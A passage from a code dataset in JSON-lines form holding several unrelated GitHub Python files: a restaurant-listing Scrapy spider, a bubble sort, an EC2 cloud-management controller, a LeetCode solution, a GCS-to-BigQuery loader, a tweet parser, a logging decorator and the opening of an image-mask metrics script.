parse(self, response):\n if response.url == 'https://www.eltenedor.es/':\n return\n\n for result in response.css('li.resultItem'):\n id = result.css('li.resultItem::attr(data-restaurant-id)').extract_first()\n \n for info in result.css('div.resultItem-information h3'):\n url = info.css('a::attr(href)').extract_first()\n nombre = info.css('a::text').extract_first()\n\n direccion = self.trataCadenas(result.css('div.resultItem-address::text').extract_first())\n\n precioMedio = self.trataCadenas(result.css('div.resultItem-averagePrice::text').extract_first())\n\n valoracion = result.css('span.rating-ratingValue::text').extract_first()\n\n print('Id:',id,'Nombre:',nombre,'Url:',url, 'Dirección:', direccion, 'Precio medio:', precioMedio, 'Valoración:',valoracion)\n\n for next_page in response.css('li.next'):\n siguiente = next_page.css('a::attr(href)').extract_first()\n print(siguiente)\n\n def trataCadenas(self, pCadena):\n pCadena = pCadena.replace('\\n', '')\n pCadena = pCadena.strip()\n\n return pCadena","repo_name":"rvegas/kc_ej_bdarchitecture_scrapy_tenedor","sub_path":"restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71333606293","text":"lst=[]\nn=int(input(\"enter the limit of list:\"))\n\nprint(\"enter the list elements:\",end=\" \")\nfor i in range(0,n):\n lst.append(int(input()))\nprint(\"input list:\",lst)\n\nfor i in range(0,n-1):\n for j in range(0,n-i-1):\n if(lst[j]>lst[j+1]):\n temp=lst[j]\n lst[j]=lst[j+1]\n lst[j+1]=temp\nprint(\"sorted lisit:\",lst)","repo_name":"fathimashibila/pythonluminar","sub_path":"luminarpythonprograms/looping/forloop/bubblesort.py","file_name":"bubblesort.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18710014173","text":" # coding: UTF-8\n #\n # Copyright 2014 by SCSK 
Corporation.\n #\n # This file is part of PrimeCloud Controller(TM).\n #\n # PrimeCloud Controller(TM) is free software: you can redistribute it and/or modify\n # it under the terms of the GNU General Public License as published by\n # the Free Software Foundation, either version 2 of the License, or\n # (at your option) any later version.\n #\n # PrimeCloud Controller(TM) is distributed in the hope that it will be useful,\n # but WITHOUT ANY WARRANTY; without even the implied warranty of\n # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n # GNU General Public License for more details.\n #\n # You should have received a copy of the GNU General Public License\n # along with PrimeCloud Controller(TM). If not, see .\n #\n\n\nfrom iaasgw.client.ec2iaasclient import EC2IaasClient\nfrom iaasgw.client.ec2iaasclientLB import EC2IaasClientLB\nfrom iaasgw.controller.ec2.ec2AddressController import ec2AddressController\nfrom iaasgw.controller.ec2.ec2InstanceController import ec2InstanceController\nfrom iaasgw.controller.ec2.ec2LoadBalancercontroller import \\\n ec2LoadBalancercontroller\nfrom iaasgw.controller.ec2.ec2OtherController import ec2OtherController\nfrom iaasgw.controller.ec2.ec2VolumController import ec2VolumController\nfrom iaasgw.controller.iaascontroller import IaasController\nfrom iaasgw.log.log import IaasLogger\nfrom iaasgw.utils.propertyUtil import getImage\nfrom iaasgw.utils.stringUtils import isNotEmpty, isBit\nimport traceback\n\n\nclass EC2Controller(IaasController):\n\n logger = IaasLogger()\n\n conn = None\n accessInfo = None\n\n client = None\n clientLb = None\n instancecontroller = None\n volumecontroller = None\n addresscontroller = None\n loadBalancercontroller = None\n othercontroller = None\n\n def __init__(self, conn, accessInfo, platforminfo, isLb = False):\n self.conn = conn\n self.accessInfo = accessInfo\n self.client = EC2IaasClient(platforminfo, accessInfo[\"USER_NAME\"], accessInfo[\"ACCESS_ID\"], accessInfo[\"SECRET_KEY\"])\n\n #コントローラ作成\n self.instancecontroller = ec2InstanceController(platforminfo, self.client, self.conn)\n self.volumecontroller = ec2VolumController(platforminfo, self.client, self.conn)\n self.addresscontroller = ec2AddressController(platforminfo, self.client, self.conn)\n self.othercontroller = ec2OtherController(platforminfo, self.client, self.conn)\n\n if isLb:\n #self.clientLb = ec2iaasclientLB(userInfo.getAccessId(), userInfo.getSecretKey)\n self.clientLb = EC2IaasClientLB(platforminfo, accessInfo[\"USER_NAME\"], accessInfo[\"ACCESS_ID\"], accessInfo[\"SECRET_KEY\"])\n #コントローラ作成\n self.loadBalancercontroller = ec2LoadBalancercontroller(platforminfo, self.clientLb, self.conn)\n\n def __del__(self):\n self.conn.rollback()\n self.conn.close()\n\n def startInstance(self, instanceNo):\n\n # インスタンスに関する処理 TODO タイムアウトリトライは未実装\n try:\n self.instancecontroller.startInstance(instanceNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n raise\n\n # ボリュームに関する処理\n table = self.conn.getTable(\"AWS_VOLUME\")\n volumes = self.conn.select(table.select(table.c.INSTANCE_NO==instanceNo))\n for volume in volumes:\n if isNotEmpty(volume[\"COMPONENT_NO\"]):\n # コンポーネント番号がある場合はスキップ\n continue\n #Volumeスタート\n self.volumecontroller.startVolume(instanceNo, volume[\"VOLUME_NO\"])\n\n # アドレスに関する処理\n self.addresscontroller.startAddress(instanceNo)\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n\n def stopInstance(self, instanceNo):\n\n try :\n # アドレスに関する処理\n self.addresscontroller.stopAddress(instanceNo)\n except Exception:\n 
self.logger.error(traceback.format_exc())\n\n try :\n # インスタンスに関する処理\n self.instancecontroller.stopInstance(instanceNo);\n except Exception:\n self.logger.error(traceback.format_exc())\n\n try :\n # ボリュームに関する処理\n tableAWSVOL = self.conn.getTable(\"AWS_VOLUME\")\n volumes = self.conn.select(tableAWSVOL.select(tableAWSVOL.c.INSTANCE_NO==instanceNo))\n\n #PCC_INSTANCE 取得\n tableINS = self.conn.getTable(\"INSTANCE\")\n pccInstance = self.conn.selectOne(tableINS.select(tableINS.c.INSTANCE_NO==instanceNo))\n\n #イメージの取得 再考の余地あり\n image = getImage(pccInstance[\"IMAGE_NO\"])\n\n for awsVolume in volumes:\n if (image[\"ebsImage\"]==\"true\"):\n self.volumecontroller.stopVolume(instanceNo, awsVolume[\"VOLUME_NO\"])\n else:\n if (isNotEmpty(awsVolume[\"VOLUME_ID\"]) and isNotEmpty(awsVolume[\"INSTANCE_ID\"])):\n updateDict = self.conn.selectOne(tableAWSVOL.select(tableAWSVOL.c.VOLUME_NO==awsVolume[\"VOLUME_NO\"]))\n updateDict[\"STATUS\"] = None\n updateDict[\"INSTANCE_ID\"] = None\n sql = tableAWSVOL.update(tableAWSVOL.c.VOLUME_NO ==updateDict[\"VOLUME_NO\"], values=updateDict)\n self.conn.execute(sql)\n except Exception:\n self.logger.error(traceback.format_exc())\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n\n def terminateInstance(self, instanceId):\n\n #1度も起動されていない\n if instanceId is None:\n return\n\n #AWS_INSTANCE 取得\n tableAWSINS = self.conn.getTable(\"AWS_INSTANCE\")\n awsInstance = self.conn.selectOne(tableAWSINS.select(tableAWSINS.c.INSTANCE_ID==instanceId))\n\n # インスタンスの停止\n change = self.client.terminateInstance(instanceId);\n\n # データベース更新\n awsInstance[\"STATUS\"] = change[\"name\"]\n sql = tableAWSINS.update(tableAWSINS.c.INSTANCE_NO ==awsInstance[\"INSTANCE_NO\"], values=awsInstance)\n self.conn.execute(sql)\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def startVolume(self, instanceNo, volumeNo):\n self.volumecontroller.startVolume(instanceNo, volumeNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def stopVolume(self, instanceNo, volumeNo):\n self.volumecontroller.stopVolume(instanceNo, volumeNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def deleteVolume(self, volumeId):\n self.client.deleteVolume(volumeId)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def startLoadBalancer(self, loadBalancerNo):\n tableLB = self.conn.getTable(\"LOAD_BALANCER\")\n loadBalancer = self.conn.selectOne(tableLB.select(tableLB.c.LOAD_BALANCER_NO==loadBalancerNo))\n\n\n # ゾーン情報の取得\n zones = self.client.describeAvailabilityZones()\n\n # サブネットID\n subnets = self.client.describeSubnets()\n\n # セキュリティグループ\n groups = self.client.describeSecurityGroups()\n groupmap = {}\n for group in groups:\n if group.vpcId is not None:\n key = group.groupName+group.vpcId\n groupmap.update({key:group.groupId})\n\n # ロードバランサの作成\n self.loadBalancercontroller.createLoadBalancer(loadBalancer[\"FARM_NO\"], loadBalancerNo, zones, subnets, groupmap)\n\n # DNSサーバへの追加 ここは未定\n #self.loadBalancercontroller.addDns(loadBalancerNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def stopLoadBalancer(self, loadBalancerNo):\n tableLB = self.conn.getTable(\"LOAD_BALANCER\")\n loadBalancer = self.conn.selectOne(tableLB.select(tableLB.c.LOAD_BALANCER_NO==loadBalancerNo))\n\n # DNSサーバからの削除\n #self.loadBalancercontroller.deleteDns(loadBalancerNo);\n\n # ロードバランサの削除\n self.loadBalancercontroller.deleteLoadBalancer(loadBalancer[\"FARM_NO\"],loadBalancerNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def configureLoadBalancer(self, loadBalancerNo):\n table = self.conn.getTable(\"LOAD_BALANCER\")\n loadBalancer = 
self.conn.selectOne(table.select(table.c.LOAD_BALANCER_NO==loadBalancerNo))\n\n # リスナーの設定\n try :\n self.loadBalancercontroller.configureListeners(loadBalancer[\"FARM_NO\"], loadBalancerNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n # ヘルスチェックの設定\n try :\n self.loadBalancercontroller.configureHealthCheck(loadBalancer[\"FARM_NO\"], loadBalancerNo)\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n # セキュリティグループの設定\n try :\n # サブネットID\n subnets = self.client.describeSubnets()\n\n # セキュリティグループ\n groups = self.client.describeSecurityGroups()\n groupmap = {}\n for group in groups:\n if group.vpcId is not None:\n key = group.groupName+group.vpcId\n groupmap.update({key:group.groupId})\n\n self.loadBalancercontroller.applySecurityGroupsToLoadBalancer(loadBalancer[\"FARM_NO\"], loadBalancerNo, groupmap, subnets)\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n # インスタンスの振り分け設定\n try :\n self.loadBalancercontroller.configureInstances(loadBalancer[\"FARM_NO\"], loadBalancerNo);\n except Exception:\n self.logger.error(traceback.format_exc())\n # ロードバランサが無効な場合は例外を握りつぶす\n if isBit(loadBalancer[\"ENABLED\"]):\n raise\n\n self.logger.info(None, \"IPROCESS-200106\", [loadBalancerNo, loadBalancer[\"LOAD_BALANCER_NAME\"]])\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n\n def allocateAddress(self):\n publicIp = None\n platformNo = self.client.getPlatformNo()\n\n tablePLAWS = self.conn.getTable(\"PLATFORM_AWS\")\n awsPlatform = self.conn.selectOne(tablePLAWS.select(tablePLAWS.c.PLATFORM_NO==platformNo))\n\n if awsPlatform[\"VPC\"] == 1:\n #VPC用のElasticIP発行処理呼び出し\n publicIp = self.client.allocateVpcAddress()\n else:\n #ElasticIP発行処理呼び出し\n publicIp = self.client.allocateAddress()\n\n #イベントログ出力\n self.conn.debug(None, None, None, None, None, \"AwsElasticIpAllocate\", [\"EC2\", publicIp])\n\n #DBへ登録\n table = self.conn.getTable(\"AWS_ADDRESS\")\n sql = table.insert({\"ADDRESS_NO\":None,\n \"USER_NO\":self.accessInfo[\"USER\"],\n \"PLATFORM_NO\":platformNo,\n \"PUBLIC_IP\":publicIp,\n \"COMMENT\":None,\n \"INSTANCE_NO\":None,\n \"INSTANCE_ID\":None})\n self.conn.execute(sql)\n\n newAddress = self.conn.selectOne(table.select(table.c.PUBLIC_IP==publicIp))\n\n self.conn.commit()\n return \"RESULT:\" + str(newAddress[\"ADDRESS_NO\"])\n\n def releaseAddress(self, addressNo):\n platformNo = self.client.getPlatformNo()\n\n tablePLAWS = self.conn.getTable(\"PLATFORM_AWS\")\n awsPlatform = self.conn.selectOne(tablePLAWS.select(tablePLAWS.c.PLATFORM_NO==platformNo))\n\n table = self.conn.getTable(\"AWS_ADDRESS\")\n address = self.conn.selectOne(table.select(table.c.ADDRESS_NO==addressNo))\n\n if not address:\n return\n\n ipaddress = address[\"PUBLIC_IP\"]\n instanceId = address[\"INSTANCE_ID\"]\n instanceNo = address[\"INSTANCE_NO\"]\n\n if awsPlatform[\"VPC\"] == 1:\n #アドレス情報取得\n address = self.client.describeAddress(ipaddress)\n #VPC用のElasticIP解放処理呼び出し\n self.client.releaseVpcAddress(ipaddress, address.allocationId)\n else:\n #ElasticIP解放処理呼び出し\n self.client.releaseAddress(ipaddress)\n\n #イベントログ\n self.conn.debug(None, None, None, None, None, \"AwsElasticIpRelease\", [\"EC2\", ipaddress])\n\n #DBから削除\n table.delete(table.c.ADDRESS_NO==addressNo).execute()\n\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def describeSnapshot(self, 
snapshotId):\n snapshots = self.othercontroller.describeSnapshot(snapshotId)\n rtString = ''\n for snapshot in snapshots:\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず全部\n rtString = rtString + snapshot.snapshotId + '#' \\\n + snapshot.volumeId + '#' \\\n + snapshot.status + '#' \\\n + snapshot.startTime + '#' \\\n + snapshot.progress + '#' \\\n + snapshot.ownerId + '#' \\\n + snapshot.volumeSize + '#' \\\n + snapshot.description + '#' \\\n + snapshot.tagSet\n\n self.conn.commit()\n return \"RESULT:\" + rtString\n\n\n def createSnapshot(self, volumeNo):\n self.othercontroller.createSnapshot(volumeNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def deleteSnapshot(self, snapshotNo):\n self.othercontroller.deleteSnapshot(snapshotNo)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def getPasswordData(self, instanceNo):\n passwordData = self.othercontroller.getPasswordData(instanceNo)\n self.conn.commit()\n return \"RESULT:\" + passwordData\n\n def describeKeyPairs(self):\n keypairs = self.client.describeKeyPairs()\n rtString = ''\n for keypair in keypairs:\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します\n rtString = rtString + keypair.keyName\n\n self.conn.commit()\n return \"RESULT:\" + rtString\n\n def createKeyPair(self, keyName):\n self.client.createKeyPair(keyName)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def deleteKeyPair(self, keyName):\n self.client.deleteKeyPair(keyName)\n self.conn.commit()\n return \"RESULT:TRUE\"\n\n def importKeyPair(self, keyName, publicKeyMaterial):\n keyPair = self.client.importKeyPair(keyName, publicKeyMaterial)\n\n keyFingerprint = keyPair.keyFingerprint\n self.conn.commit()\n return \"RESULT:\" + keyFingerprint\n\n def describeSecurityGroups(self, vpcid = None):\n groups = self.client.describeSecurityGroups()\n rtString = ''\n for group in groups:\n #VPCIDが一致する物以外は除外\n if vpcid is not None:\n if vpcid != group.vpcId:\n continue\n #VPCID未入力時はVPCIDが設定されていない物のみ使用\n else:\n if group.vpcId is not None:\n continue\n\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します\n rtString = rtString + group.groupName\n\n self.conn.commit()\n return \"RESULT:\" + rtString\n\n def describeAvailabilityZones(self):\n zones = self.client.describeAvailabilityZones()\n\n #available\n rtString = ''\n for zone in zones:\n #有効な物のみ利用する\n if zone.zone_state != \"available\":\n continue\n\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します IDに相当するパラメータが無い為NONEを入れておく\n rtString = rtString + zone.name + \"#NONE\"\n self.conn.commit()\n #出力として返す\n return \"RESULT:\" + rtString\n\n\n def describeSubnets(self, vpcid = None):\n subnets = self.client.describeSubnets()\n rtString = ''\n for subnet in subnets:\n if vpcid is not None:\n if vpcid != subnet.vpcId:\n continue\n\n if rtString != '':\n rtString = rtString + \"##\"\n\n #とりあえず必要な情報のみ返します\n rtString = rtString + subnet.subnetId + '#' + subnet.availabilityZone+ '#' + subnet.cidrBlock\n self.conn.commit()\n return \"RESULT:\" + rtString\n","repo_name":"primecloud-controller-org/primecloud-controller","sub_path":"iaas-gw/src/iaasgw/controller/ec2/ec2controller.py","file_name":"ec2controller.py","file_ext":"py","file_size_in_byte":17455,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"67"} +{"seq_id":"5359603347","text":"class Solution:\n def longestIncreasingPath(self, matrix: [[]]) -> int:\n if not matrix:\n return 0\n visited: [[]] = [[0 for _ in range(len(matrix[0]))] for _ in 
range(len(matrix))]\n max_v = -10 ** 7\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n cur_len = self.fin_longest_len(matrix, visited, i, j, -10 ** 7)\n max_v = max(max_v, cur_len)\n return max_v\n\n def fin_longest_len(self, matrix, visited, i, j, pre):\n if not 0 <= i < len(matrix) or not 0 <= j < len(matrix[0]) or matrix[i][j] <= pre:\n return 0\n if visited[i][j] != 0:\n return visited[i][j]\n cur = matrix[i][j]\n up = self.fin_longest_len(matrix, visited, i - 1, j, cur)\n down = self.fin_longest_len(matrix, visited, i + 1, j, cur)\n lf = self.fin_longest_len(matrix, visited, i, j - 1, cur)\n rt = self.fin_longest_len(matrix, visited, i, j + 1, cur)\n visited[i][j] = max(up, down, lf, rt) + 1\n return visited[i][j]\n","repo_name":"jack12356/leetcode2021","sub_path":"Nicco的高级算法python/c_8_longestIncreasingPath.py","file_name":"c_8_longestIncreasingPath.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23492866593","text":"import functions_framework\nimport os\nimport io\nimport re\nimport pandas as pd\nimport datetime\nfrom google.cloud import storage\nfrom google.cloud import bigquery\n\nPROJECT_ID = os.environ.get('GCP_PROJECT', '')\nGCS_BUCKET = os.environ.get('GCS_BUCKET_NAME', '')\nBQ_DATASET = os.environ.get('BQ_DATASET_ID', '')\nBQ_TABLE = os.environ.get('BQ_TABLE_NAME', '')\n\ndef read_from_gcs(bucket, file):\n client = storage.Client(\n project=PROJECT_ID\n )\n bucket = client.get_bucket(bucket)\n blob = bucket.blob(file)\n data = blob.download_as_text()\n\n return data\n\ndef clean_data(datastr):\n # stupid \\r\\n line terminator poses a problem for dataframe.read_csv which only allows 1 char\n data = datastr.replace('\\r\\n', '\\n') \n strio = io.StringIO(data)\n df = pd.read_csv(\n strio, \n dtype=str, # keep the leading 0,\n sep=',', \n header=0, \n lineterminator='\\n')\n\n # fix column names\n df.columns = df.columns.str.replace(' ', '_')\n df.columns = df.columns.str.lower()\n\n # remove special chars from numbers\n df['eligibles'] = df['eligibles'].str.replace(',', '')\n df['enrolled'] = df['enrolled'].str.replace(',', '')\n df['penetration'] = df['penetration'].str.replace('%', '')\n \n # convert into int type\n df['eligibles'] = pd.to_numeric(df['eligibles'], errors='coerce').astype('Int64')\n df['enrolled'] = pd.to_numeric(df['enrolled'], errors='coerce').astype('Int64')\n df['penetration'] = pd.to_numeric(df['penetration'], errors='coerce').astype('float')\n\n # have to scrub bad data from data source\n return df[df['state_name'].str.contains('Pending State Designation')==False]\n\ndef import_df(df, table_id):\n client = bigquery.Client(\n project=PROJECT_ID\n )\n job_config = bigquery.LoadJobConfig(\n # overrides BQ default schema detection for these columns\n schema=[\n bigquery.SchemaField(\"fipsst\", \"STRING\"),\n bigquery.SchemaField(\"fipscnty\", \"STRING\"),\n bigquery.SchemaField(\"fips\", \"STRING\"),\n bigquery.SchemaField(\"ssast\", \"STRING\"),\n bigquery.SchemaField(\"ssacnty\", \"STRING\"),\n bigquery.SchemaField(\"ssa\", \"STRING\")\n ],\n write_disposition=\"WRITE_TRUNCATE\"\n )\n job = client.load_table_from_dataframe(\n df, \n table_id, \n job_config=job_config\n )\n job.result()\n table = client.get_table(table_id)\n print(f'Loaded {table.num_rows} into {table_id}')\n\ndef import_csv_to_bq(gsurl, table_id):\n client = bigquery.Client(\n project=PROJECT_ID\n )\n job_config = bigquery.LoadJobConfig(\n autodetect=True,\n 
source_format=bigquery.SourceFormat.CSV\n )\n load_job = client.load_table_from_uri(\n gsurl, table_id, job_config=job_config\n )\n load_job.result()\n dest_table = client.get_table(table_id)\n print(f'Loaded {dest_table.num_rows} rows from {gsurl}')\n\n@functions_framework.cloud_event\ndef handle_gcs_event(cloud_event):\n data = cloud_event.data\n bucket = data['bucket']\n file = data['name']\n\n try:\n #include '.csv' JUST IN CASE we encounter another \\d{4}_\\d{2} in the file name\n dt_str = re.findall(r'\\d{4}_\\d{2}.csv', file)[0].replace('.csv', '')\n file_dt = datetime.datetime.strptime(dt_str, '%Y_%m')\n # add '01' at the end to enable bq to index tables by date; needs YYYYMMDD format\n fmt_dt = file_dt.strftime('%Y%m01')\n table_id = f'{PROJECT_ID}.{BQ_DATASET}.{BQ_TABLE}_{fmt_dt}'\n\n data = read_from_gcs(bucket, file)\n df = clean_data(data)\n import_df(df, table_id)\n except Exception as e:\n print(e)\n ","repo_name":"wilwang/gcp-func-sample","sub_path":"import-to-bq/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"11501685803","text":"'''\nИз букв слова Р А Д У Г А составляются 6-буквенные последовательности. Сколько можно составить различных последовательностей,\nесли известно, что в каждой из них содержится не менее 3 согласных?\n'''\nfrom itertools import product\nwords = product('радуг', repeat=6)\nk = 0\nfor w in words:\n word = ''.join(w)\n if (word.count('р') + word.count('д') + word.count('г')) >= 3:\n k += 1\nprint(k)\n","repo_name":"plugarivan/ege_2023","sub_path":"task8/8-6.py","file_name":"8-6.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"19921270203","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/11/10 13:52\r\n# @Author : Zhu Shidong\r\n# @Site : \r\n# @File : log_decorator.py\r\n# @Software: PyCharm\r\n# @Function:\r\nimport logging\r\nimport const\r\nfrom functools import wraps\r\nimport time\r\n\r\n\r\nfmt = \"%(asctime)s - %(levelname)s - %(message)s\"\r\nerr_fmt = \"%(asctime)s - %(levelname)s - %(filename)s[:%(lineno)d] - %(message)s\"\r\ndate_fmt = \"%Y-%b-%d %H:%M:%S\"\r\n\r\nlogger = logging.getLogger(\"my_logger\")\r\nlogger.setLevel(logging.DEBUG)\r\nformatter = logging.Formatter(fmt, date_fmt)\r\nhandler = logging.FileHandler(const.LOG_FILE)\r\nhandler.setFormatter(formatter)\r\nlogger.addHandler(handler)\r\n\r\ndef log_decorator(func):\r\n \"\"\"\r\n 日志修饰器\r\n :param func:\r\n :return:\r\n \"\"\"\r\n @wraps(func)\r\n def with_logger(*args, **kwargs):\r\n func_name = func.__name__\r\n arg_names = func.func_code.co_varnames[:func.func_code.co_argcount] # 参数name\r\n params_str = func_name + \"(\" + ', '.join(\r\n '%s=%r' % entry\r\n for entry in\r\n zip(arg_names, args[:len(arg_names)]) + [(\"args\", list(args[len(arg_names):]))] + [(\"kwargs\", kwargs)]) + \")\"\r\n logger.debug(params_str)\r\n # print params_str\r\n try:\r\n out = func(*args, **kwargs)\r\n return out\r\n except:\r\n logger.exception(\r\n 'exec func {func_name} failed'.format(func_name=func.__name__))\r\n logger.info('done exec func %s' % func.__name__)\r\n return with_logger\r\n\r\n\r\ndef exec_time_decorator(func):\r\n \"\"\"\r\n 日志修饰器\r\n :param func:\r\n :return:\r\n \"\"\"\r\n @wraps(func)\r\n def time_logger(*args, **kwargs):\r\n func_name = func.__name__\r\n arg_names = 
func.func_code.co_varnames[:func.func_code.co_argcount] # 参数name\r\n params_str = func_name + \"(\" + ', '.join(\r\n '%s=%r' % entry\r\n for entry in\r\n zip(arg_names, args[:len(arg_names)]) + [(\"args\", list(args[len(arg_names):]))] + [(\"kwargs\", kwargs)]) + \")\"\r\n logger.debug(params_str)\r\n # print params_str\r\n use_time = 0\r\n try:\r\n start_time = time.time()\r\n out = func(*args, **kwargs)\r\n end_time = time.time()\r\n use_time = str(end_time-start_time)\r\n logger.debug('exec func {params_str} with time: {exec_time}'.format(\r\n params_str=params_str, exec_time=use_time))\r\n return out\r\n except:\r\n logger.exception(\r\n 'exec func {func_name} failed'.format(func_name=func.__name__))\r\n logger.debug('exec func {params_str} with time: {exec_time}'.format(\r\n params_str=params_str, exec_time=use_time))\r\n return time_logger\r\n\r\n\r\n@log_decorator\r\ndef test(filename, *args, **kwargs):\r\n pass\r\n\r\nif __name__ == '__main__':\r\n test('1.txt',(0,1,1,3), aa={'a':1, 'b':2})","repo_name":"DemonZSD/thread_demo","sub_path":"utils/log_decorator.py","file_name":"log_decorator.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35263335427","text":"import json\nimport datetime as dt\nimport logging as log\nfrom tweet import Tweet\nfrom twitteruser import TwitterUser\n\n\nclass TweetScraperService(object):\n def scrape_file(self, file_path):\n \"\"\"deserialize file of json tweets and return list with relevant fields\n\n :rtype: list\n :param file_path: filepath to file of json tweets\n :return: tweet_list: list of tweet maps with relevant fields. If file cannot be opened return None\n \"\"\"\n try:\n \"\"\"open file specified in file_path \"\"\"\n file_lines = self.__open_file(file_path)\n except IOError as io:\n \"\"\"If file cannot be opened return None\"\"\"\n return None\n \"\"\"serialize list of lines to a list of tweet maps \"\"\"\n tweet_list = self.scrape_tweet_lines(file_lines)\n return tweet_list\n\n def scrape_tweet_lines(self, raw_tweet_lines):\n\n \"\"\" Iterate through lines of tweet json and return list of tweet maps\n\n :param raw_tweet_lines: list of lines from tweets file in json format\n :return list of tweets mapped for relevant fields :\n \"\"\"\n error_count = 0\n \"\"\"list to collect tweets in\"\"\"\n tweets_map_list = []\n \"\"\"strip data from each tweet in file \"\"\"\n for line in raw_tweet_lines:\n \"\"\"strip relevant fields and make map\"\"\"\n mapped_tweet = self.map_tweet_user(line)\n tweets_map_list.append(mapped_tweet)\n return tweets_map_list\n\n @staticmethod\n def deserialize_tweet(raw_tweet):\n \"\"\"\n :param raw_tweet:\n :return Tweet:\n\n \"\"\"\n tweet = Tweet()\n full_tweet = json.loads(raw_tweet)\n\n try:\n \"\"\"map relevant fields to object\"\"\"\n tweet.text = full_tweet['text']\n tweet.favorites = full_tweet['user']['favourites_count']\n tweet.retweets = full_tweet['retweet_count']\n tweet.in_reply_to_status_id = full_tweet['in_reply_to_status_id']\n tweet.in_reply_to_user_id = full_tweet['in_reply_to_user_id']\n tweet.user_id = full_tweet['user']['id']\n datetime = dt.datetime.strptime(full_tweet['created_at'], '%a %b %d %H:%M:%S %z %Y')\n tweet.create_datetime = datetime\n except KeyError as ke:\n log.warning('Could not map tweet: '.format(ke))\n except Exception as inst:\n print(inst)\n return tweet\n\n @staticmethod\n def deserialize_user(raw_tweet):\n \"\"\"\n :param raw_tweet:\n :return TwitterUser:\n \"\"\"\n user 
= TwitterUser()\n full_tweet = json.loads(raw_tweet)\n try:\n user.user_id = full_tweet['user']['id']\n user.user_name = full_tweet['user']['name']\n user.screen_name = full_tweet['user']['screen_name']\n user.location = full_tweet['user']['location']\n user.followers = full_tweet['user']['followers_count']\n except KeyError as ke:\n log.warning('Could not map user: '.format(ke))\n return user\n\n def map_tweet_user(self, full_tweet):\n \"\"\"process a tweet tuple and map relevant fields\n\n :rtype namedtuple{Tweet, TwitterUser}\n :param full_tweet: tweet as text\n :return: map of a Tweet and TwitterUser\n \"\"\"\n tweet_user_map = {}\n tweet_user_map['tweet'] = self.deserialize_tweet(full_tweet)\n tweet_user_map['user'] = self.deserialize_user(full_tweet)\n return tweet_user_map\n\n def __open_file(self, file_path):\n \"\"\" Open a file given a file path and return lines in file as a list\n\n :rtype: list\n :param file_path: path of file to be opened\n :return: list of all lines contained in the file specified by file_path\n :except: IOError: if file_path is incorrect or file cannot be opened\n \"\"\"\n try:\n \"\"\"open file from given filepath\"\"\"\n raw_file = open(file_path)\n \"\"\"make a list of the lines contained in the file\"\"\"\n file = raw_file.readlines()\n return file\n except IOError as io:\n log.warning(\"Could not open {}\\n {}\".format(file_path, type(io)))\n raise io\n\n\nif __name__ == '__main__':\n file_path = 'data/twitter_data.txt'\n scraper_service = TweetScraperService()\n tweet_list = scraper_service.scrape_file(file_path)\n print(tweet_list)\n","repo_name":"johnStauffer/Donary_Clintump","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7266869836","text":"import cv2\nimport numpy as np\nimport os\n\ndef calcola_metriche(veri_positivi, falsi_positivi, falsi_negativi, veri_negativi):\n # Calcola la precisione\n precision = veri_positivi / (veri_positivi + falsi_positivi)\n\n # Calcola il recall\n recall = veri_positivi / (veri_positivi + falsi_negativi)\n\n # Calcola l'F1-score\n f1_score = 2 * (precision * recall) / (precision + recall)\n\n # Calcola l'accuratezza\n accuracy = (veri_positivi + veri_negativi) / (veri_positivi + veri_negativi + falsi_positivi + falsi_negativi)\n\n return precision, recall, f1_score, accuracy\n\nveri_positivi=0\nveri_negativi=0\nfalsi_positivi=0\nfalsi_negativi=0\ni=0\ncartella1 = r\"C:\\Users\\Sabino\\Desktop\\sistemi multimediali\\database_sclere\\original size mask\"\ncartella2 = r\"C:\\Users\\Sabino\\Desktop\\sistemi 